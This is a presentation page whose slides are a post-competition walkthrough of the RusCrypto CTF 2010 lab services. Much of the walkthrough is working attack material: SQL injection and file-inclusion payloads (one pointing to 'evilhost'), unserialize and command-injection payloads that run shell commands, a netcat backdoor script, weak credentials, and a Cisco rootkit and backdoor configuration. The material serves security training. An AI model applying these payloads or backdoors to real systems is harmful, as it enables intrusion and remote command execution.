Презентация РусКрипто CTF 2010, Full Disclosure (мастер класс) онлайн
На нашем сайте вы можете скачать и просмотреть онлайн доклад-презентацию на тему РусКрипто CTF 2010, Full Disclosure (мастер класс) абсолютно бесплатно. Урок-презентация на эту тему содержит всего 65 слайдов. Все материалы созданы в программе PowerPoint и имеют формат ppt или же pptx. Материалы и темы для презентаций взяты из открытых источников и загружены их авторами, за качество и достоверность информации в них администрация сайта не отвечает, все права принадлежат их создателям. Если вы нашли то, что искали, отблагодарите авторов - поделитесь ссылкой в социальных сетях, а наш сайт добавьте в закладки.
Презентации » Образование » РусКрипто CTF 2010, Full Disclosure (мастер класс)
Оцените!
Оцените презентацию от 1 до 5 баллов!
- Тип файла:ppt / pptx (powerpoint)
- Всего слайдов:65 слайдов
- Для класса:1,2,3,4,5,6,7,8,9,10,11
- Размер файла:5.35 MB
- Просмотров:71
- Скачиваний:0
- Автор:неизвестен
Слайды и текст к этой презентации:
№4 слайд

Содержание слайда: РусКрипто CTF 2010
РусКрипто CTF — это открытые соревнования по защите информации, проводимые по принципам игры Capture The Flag (захват флага).
РусКрипто CTF — это не классический CTF!
Для захвата флагов в РусКрипто CTF необходимо воспользоваться реальными уязвимостями в самых настоящих (продуктивных) системах.
Расположение большинства флагов заранее известно.
В основу легенды соревнования РусКрипто CTF 2010 легло повествование «Лавина» Нила Стивенсона.
№6 слайд

Содержание слайда: РусКрипто CTF 2010: Как все было устроено «изнутри»
Инфраструктуры команд работали на двух серверах:
Fortice A133 (SR1500AL, XEON 5345x2, DDR2 FB DIMM 667MHz 2Gbx4, SEAGATE ST3450802SS)
Fortice A234 (SR2600UR, XEON 5550x2, DDR3 DIMM 1333MHz 1Gbx6, SEAGATE ST3450802SSx2 RAID SAS 0)
Инфраструктуры команд функционировали под управлением VMWare ESX в виртуальной среде
В качестве основного коммутатора использовался:
Cisco Catalyst 3560 (WS-C3560-48TS)
Сеть разделялась с помощью Virtual Local Area Network (Virtual LAN) IEEE 802.1Q, настройки коммутатора соответствовали максимальному уровню защищенности
Для организации игрового Wi-Fi-пространства применялось следующее оборудование:
Cisco WLS (WLC2106-K9), Access Point AIR-LAP1242AG-A-K9
Игрокам было предоставлено коммуникационное оборудование «из коробки» на базе CISCO IOS.
№9 слайд

Содержание слайда: РусКрипто CTF 2010: Как все было устроено «изнутри»
Использовалось следующее программное обеспечение:
VMWare ESX 4.x с разделением виртуальных сетевых адаптеров по соответствующим идентификаторам сетей (VLAN ID).
ОС FreeBSD 8.0-RELEASE-p2, в которой игроки обладали доступом только к среде JAIL (полностью контролируемая среда).
Примечание: «игровой» коммутатор Cisco был запущен под управлением Dynamips.
ОС Microsoft Windows 2003 (Trial), в которой были запущены инструменты Radmin (Trial), SMS-вирус и n00bkit (rootkit).
ОС Microsoft Windows 98.
CMS 1C-Битрикс в качестве платформы взаимодействия жюри и игроков, отображения результатов соревнования, а также в качестве «бонусного» задания в контексте соревнования CTF.
Nagios для мониторинга доступности всех систем.
Собственные сценарии для отслеживания корректного функционирования разработанных сервисов и их обновления.
Все ПО, обеспечивающее функционирование CTF, было обновлено до последних версий на день проведения соревнования.
Для обеспечения безопасности «скелета» CTF использовался принцип эшелонированной защиты во всех компонентах сети.
№12 слайд

Содержание слайда: РусКрипто CTF 2010
Подготовленные сервисы:
Корпоративный сайт (jail1)
Служба информирования доставщиков (jail2)
Система документооборота (jail3)
Сервис управления датчиками (jail4)
Тестовый сервер (jail5)
Коммутатор Cisco (jail6)
Точка беспроводного доступа
Windows 2003 (ноутбук менеджера)
Windows 98 (компьютер дядюшки Энцо)
№14 слайд

Содержание слайда: РусКрипто CTF 2010: Корпоративный сайт (st0)
SQL Injection (MySQL 5.x) в Insert (default error based) over Mod_Security
Уязвимый запрос:
…
$query = "INSERT INTO pizza (pizza, time) VALUES (".$_POST['pizza'].",".$_POST['time'].")";
…
Эксплуатация:
POST pizza=1
POST time=(/*!12345select 1 from(select count(*),concat((select mid(load_file('/YOURFLAG.TXT'),451,32)),floor(rand(0)*2))x from pizza group by x)a)*/
ИЛИ
POST pizza=1
POST time=(/*!12345select 1 from(select count(*),concat((select mid(load_file(0x2F594F5552464C41472E545854),451,32)),floor(rand(0)*2))x from pizza group by x)a)*/
№16 слайд

Содержание слайда: РусКрипто CTF 2010: Корпоративный сайт (st0)
Подбор + File Including в cookie (default RFI)
Прежде чем воспользоваться уязвимостью, необходимо авторизоваться на странице admin.php. Авторизоваться можно несколькими способами:
подобрав пароль к учетной записи admin (по умолчанию «1234567»);
подключившись напрямую к MySQL под учетной записью пользователя www (http://192.168.X.1/config.inc) и создав нового пользователя.
Уязвимый участок кода:
…
include_once($_COOKIE['lang'].'.php');
…
Эксплуатация (правила Mod_Security намеренно были изменены):
LFI: Cookie[lang]=non/../../../../../../YOURFLAG.TXT/.[496]/.
RFI: Cookie[lang]=http://evilhost/s
№19 слайд

Содержание слайда: РусКрипто CTF 2010: Корпоративный сайт (st1)
Выполнение команд на сервере over unserialize()
Потенциально уязвимый участок кода (login.php):
…
include_once("config.inc");
include_once("functions.php");
if(isset($_SESSION['captcha_keystring']) && $_SESSION['captcha_keystring'] == $_POST['key']){
$sessid = unserialize(base64_decode($_COOKIE['sessid']));
…
Уязвимый участок кода (functions.php):
…
function __destruct(){echo $this->shutdown;
if (!empty($this->shutdown)){
$var = $this->shutdown[0];
$arg = $this->shutdown[1];
$var($arg);
…
Еще почитать: «PHP unserialize() _SESSION and Dynamics», Владимир Воронцов (http://oxod.ru/?p=244)
№20 слайд

Содержание слайда: РусКрипто CTF 2010: Корпоративный сайт (st1)
Выполнение команд на сервере over unserialize()
Эксплуатация:
O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:7:"phpinfo";i:1;s:2:"-1";}}
cookie[sessid]=Tzo4OiJEYXRhYmFzZSI6MTp7czo4OiJzaHV0ZG93biI7YToyOntpOjA7czo3OiJwaHBpbmZvIjtpOjE7czoyOiItMSI7fX0NCg==
O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:6:"system";i:1;s:2:"ls";}}
cookie[sessid]=Tzo4OiJEYXRhYmFzZSI6MTp7czo4OiJzaHV0ZG93biI7YToyOntpOjA7czo2OiJzeXN0ZW0iO2k6MTtzOjI6ImxzIjt9fQ0KDQo=
O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:8:"passthru";i:1;s:17:"cat /YOURFLAG.TXT";}}
cookie[sessid]=Tzo4OiJEYXRhYmFzZSI6MTp7czo4OiJzaHV0ZG93biI7YToyOntpOjA7czo4OiJwYXNzdGhydSI7aToxO3M6MTc6ImNhdCAvWU9VUkZMQUcuVFhUIjt9fQ==
№23 слайд

Содержание слайда: РусКрипто CTF 2010: Корпоративный сайт
Дополнительные уязвимости
Раскрытие конфиденциальных данных (/config.inc, /test.php, /phpinfo.php)
Раскрытие конфиденциальной информации (display_errors=off, etc)
Подбор (/admin.php, MySQL)
Отсутствие таймаута сессии
Предугадываемое значение идентификатора captcha
Уязвимые (намеренно измененные) правила Mod_security
Недостаточное противодействие автоматизации при заказе пиццы
Интерфейс администрирования не защищен надлежащим образом
Передача конфиденциальных данных по открытому протоколу HTTP
Уязвимые конфигурации ОС/MySQL/Apache/PHP
№26 слайд

Содержание слайда: РусКрипто CTF 2010: Служба информирования доставщиков (st0)
Классическая SQL Injection (PostgreSQL)
Уязвимое regexp:
from django.conf.urls.defaults import *
…
(r'^pizza(.*)$', 'ctfproject.ctfpyweb.views.pizza'),
…
Эксплуатация:
/ctfproject/pizza5;select+1,version()
/ctfproject/pizza5;select+1,pg_read_file('YOURFLAG.TXT',0,500)
ИЛИ
/ctfproject/pizza5%20and%201=2%20union%20select%20null,null,version(),null,null
/ctfproject/pizza5%20and%201=2%20union%20select%20null,null,pg_read_file('YOURFLAG.TXT',0,500),null,null
№28 слайд

Содержание слайда: РусКрипто CTF 2010: Служба информирования доставщиков (st1)
Выполнение команд на сервере over AJAX
Уязвимый участок кода:
…
if('args' in request.POST):
args = request.POST['args']
try:
retval = subprocess.Popen("uname -%s" % (args), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()[0]
…
Эксплуатация:
<script>
var params = 'args=i | cat /YOURFLAG.TXT'
xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST", "http://192.168.X.2/ctfproject/confdata", false);
xmlhttp.send(params);
document.write(xmlhttp.responseText);
</script>
№29 слайд

Содержание слайда: РусКрипто CTF 2010: Служба информирования доставщиков
Дополнительные уязвимости
XPath Injection
Open Proxy
Подбор (раздел администрирования)
Недостаточное противодействие автоматизации в форме обратной связи
Отсутствие таймаута сессии
Передача конфиденциальных данных по открытому протоколу HTTP
Уязвимые конфигурации ОС/PostgreSQL/Apache/PYTHON
№31 слайд

Содержание слайда: РусКрипто CTF 2010: Система документооборота
Выход за пределы каталога (path traversal)
Фрагмент уязвимого кода:
...
if (ptr[strlen(ptr) - 1] == '/')
strcat(ptr, "index.html");
strcpy(resource, WEBROOT);
strcat(resource, ptr);
fd = open(resource, O_RDONLY, 0);
...
Эксплуатация:
GET /../../YOURFLAG.TXT HTTP/1.1
№33 слайд

Содержание слайда: РусКрипто CTF 2010: Система документооборота
Переполнение буфера (buffer overflow)
Фрагмент уязвимого кода:
...
char tmp[8192];
tmp[0]=1;
...
while(1) {
tmp[1]=tmp[0]++;
...
void handle_connection(int sockfd, struct sockaddr_
in *client_addr_ptr) {
unsigned char *ptr, resource[500], request[8192];
int htr, fd, length;
length = recv_line(sockfd, request);
...
«Hacking: The Art of Exploitation», Jon Erickson
№38 слайд

Содержание слайда: РусКрипто CTF 2010: Сервис управления датчиками
Однобайтовое переполнение
Фрагмент уязвимого кода:
...
char cmd[50]; //was 4096
...
nb = anetRead(cli->fd, cmd, 140);
...
else if (strcmp(cmd, "SHELL") == 0 && loc_shl != 0) {
// execute shell command
...
Эксплуатация:
OK CosaNostra Owen Control 1.0.23
AAA[126]AAA
-ERR
shell cat /YOURFLAG.TXT
№43 слайд

Содержание слайда: РусКрипто CTF 2010: Тестовый сервер
Подбор (множество интерфейсов)
Доступные протоколы:
login/shell/telnet/ssh,
mysql,
ftp (доступ к корневому каталогу веб-сервера)
Учетные записи со слабыми паролями:
toor:root
andrey:andrey
www1:password
alla:misha
olga:4321
sergey:qwerty1
№45 слайд

Содержание слайда: РусКрипто CTF 2010: Тестовый сервер
Back-door (выполнение команд на сервере)
[~] cat /etc/crontab
...
*/5 * * * * root /usr/libexec/atrun
...
[~] file /usr/libexec/atrun
/usr/libexec/atrun: POSIX shell script text executable
[~] cat /usr/libexec/atrun
#!/bin/sh
if [ `ps -ax|grep 31337|wc -l` -lt 2 ]; then /usr/bin/nc -l -w 10 -u 31337|/bin/sh|nc -w 10 -l 31337; fi
№47 слайд

Содержание слайда: РусКрипто CTF 2010: Точка беспроводного доступа
Даже с отключенными настройками безопасности (включая IPS) оборудование Cisco Wireless LAN Controller 2100 (AP Cisco 1240) способно успешно противодействовать атаке на протокол WEP без легитимного трафика пользователей.
Ноутбуки планировавшиеся для создания трафика были заняты поддержкой выхода в интернет.
Задача была не решаемой.
№49 слайд

Содержание слайда: РусКрипто CTF 2010: Коммутатор Cisco
Подбор
Cisco/Cisco; enable zxasqw
Выгрузка конфигурации через SNMP
snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1
…
Back-door
...
aaa authentication login default local-case
aaa authentication login authen none
...
line vty 0 3
exec-timeout 0 0
line vty 4
exec-timeout 0 0
privilege level 15
login authentication authen
...
№50 слайд

Содержание слайда: РусКрипто CTF 2010: Коммутатор Cisco
Cisco TCL rootkit
…
if { [regexp {^(show|sh) flag\s*(.*)$} $line]} {
puts $sock "Flag: \$1\$Or\/\/v5Vx\$Of2lpfkwS1N7AKuz1kXaa\/"
return [close $sock]
}
…
puts -nonewline $sock "Router# "
flush $sock
…
Методы обнаружения:
# sh proc | i Tcl
# sh tcp brief all numeric
# sh control-plane host open-ports
ХАКЕР № 11 (142) «Атака через TCL», Роман Ильин
№55 слайд

Содержание слайда: РусКрипто CTF 2010: Windows 2003
Вектор 1 (долгий):
Подобрать пароль к Radmin (pw: 11111111)
Обезвредить SMS-вирус (http://www.esetnod32.ru/.support/winlock/, http://www.drweb.com/unlocker/, http://support.kaspersky.ru/viruses/deblocker)
Обнаружить и выгрузить rootkit (http://www.eset.com/download/sysinspector, http://www.gmer.net/, http://www.antirootkit.com/, etc)
Найти флаг в каталоге временных файлов
Подобрать пароль к архиву (juancp, etehadd… InsidePro.dic)
Вектор 2 (быстрый):
Подобрать пароль администратора (P@ssw0rd) или воспользоваться эксплойтом
Подключиться через SMB (правила FW и IPSEC запрещают доступ по SMB из «своей сети», но разрешают из «чужой»)
Найти флаг в каталоге временных файлов
Подобрать пароль к архиву (juancp, etehadd… InsidePro.dic)
Скачать все slide презентации РусКрипто CTF 2010, Full Disclosure (мастер класс) одним архивом:
Похожие презентации
-
Проценты в жизни человека Автор: Лемешевская Евгения 8 класс МОУ Мокеевская СОШ Ярославского МР 2010 г. - презентация
-
Мастер - класс в сообществе « ИКТ в НШ » Блог в работе учителя начальных классов« ИКТ в НШ » Руководители : Рождественская Л. В. , Смирн
-
Мастер-класс в сообществе «ИКТ в НШ» Блог в работе учителя начальных классов Руководители: Рождественская Л. В. , Смирнова М. А.
-
Государственная (итоговая) аттестация выпускников IX классов общеобразовательных учреждений городского округа Самара в 2010-2011 учеб
-
Автор учитель начальных классов Красавина Ю. А. ГОУ лицей 533 образовательный комплекс «Малая Охта» Г. Санкт-Петербург 2010. - презентац
-
МОУ КАНИНСКАЯ СОШ Мастер-класс «Новые формы и методы обучения географии» Подготовила – Комарова Ирина Евгеньевна
-
Боровиковский В. Л. – «Великий мастер русского портрета» Подготовил: Новиков Олег, 6 класс МОУ СОШ 16
-
Блочное изучение нового материала в преподавании математики в старшей школе Мастер- класс Учитель: математики Любовь А
-
Мастер – класс учителя ИЗО МОУ СОШ 3 Беспаловой Ж. А.
-
Мастер-класс Учитель: Джеманкулова Э. А